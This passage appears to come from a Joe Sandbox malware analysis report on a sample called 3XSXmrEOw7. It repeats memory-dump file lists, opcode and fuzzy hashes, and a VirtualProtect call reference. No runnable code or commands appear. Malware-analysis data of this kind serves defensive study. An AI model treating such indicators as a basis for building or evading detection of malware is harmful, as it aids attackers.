                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                        • Instruction ID: cb57e4122a001d9a5aea0e5eb30d6428f4d9882cba75bea230fd897a336bee3d
                                                                                                                        • Opcode Fuzzy Hash: c6cabd91fa77b4f7cb2f0afbcf9f08ffd83e48e901675271b9030fe6847668bf
                                                                                                                        • Instruction Fuzzy Hash: E6D135A2D082649AF7208624DC447EB7A69DF51310F0440FED98D672C1DABE1FC6CBA7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                        • Instruction ID: de9717e0791dd079f802cc80978fd1fc09d249abcbc8c2fa0664e0f4ee9ea232
                                                                                                                        • Opcode Fuzzy Hash: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                        • Instruction Fuzzy Hash: DCD136A2D082649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                        • Instruction ID: 0aac46a3f7d70648d6f49242e283d0af4f9a7a282a53a1faa8e93d764a905c88
                                                                                                                        • Opcode Fuzzy Hash: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                        • Instruction Fuzzy Hash: 3FD126E2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                        • Instruction ID: c42c67ffbe9c770f0b4030029c86904fbf9cde12d90d93a0a162ff4bceb9b38a
                                                                                                                        • Opcode Fuzzy Hash: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                        • Instruction Fuzzy Hash: 56D127E2C082649AF7208624EC447EB7A79EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                        • Instruction ID: 458d38c4ac4ac2e0a890c9bb8e4a9faea148a723fd4b00d52b4af6688bdf90c3
                                                                                                                        • Opcode Fuzzy Hash: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                        • Instruction Fuzzy Hash: 4ED135E2D082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                        • Instruction ID: 59163a79f1e718bf8fdf548af5e6fdd436e52e4d132ed39006692e3f8e990f66
                                                                                                                        • Opcode Fuzzy Hash: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                        • Instruction Fuzzy Hash: 36D147A2D042649AF7208624EC44BEB7A69DF51310F0440FED94DA72C1D6BE5FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                        • Instruction ID: 6c61b91d5ed829c07fb3eca1805c18e4c1d41d2c227a964cc652b6df1d4533f5
                                                                                                                        • Opcode Fuzzy Hash: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                        • Instruction Fuzzy Hash: 51D135E2C082649AF7208624DC447EB7A69EF51314F1480FED94DA62C1D6BE1FC6CB67
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                        • Instruction ID: 283ebc008c54337029ad982e6338bed2757a0bab3e3c0bbaa6d50b25317a4fa5
                                                                                                                        • Opcode Fuzzy Hash: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                        • Instruction Fuzzy Hash: C2D146B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA62C1DABE5FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                        • API String ID: 544645111-3687113455
                                                                                                                        • Opcode ID: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                        • Instruction ID: a52d7f9a2be6bdc38b4d8026e473589b155c0d63e94e31f5312e0c049a63bb1f
                                                                                                                        • Opcode Fuzzy Hash: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                        • Instruction Fuzzy Hash: C9D136A2D082649AF7208624DC44BEB7A69DF51314F0440FED94D672C1DABE1FC6CB67
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
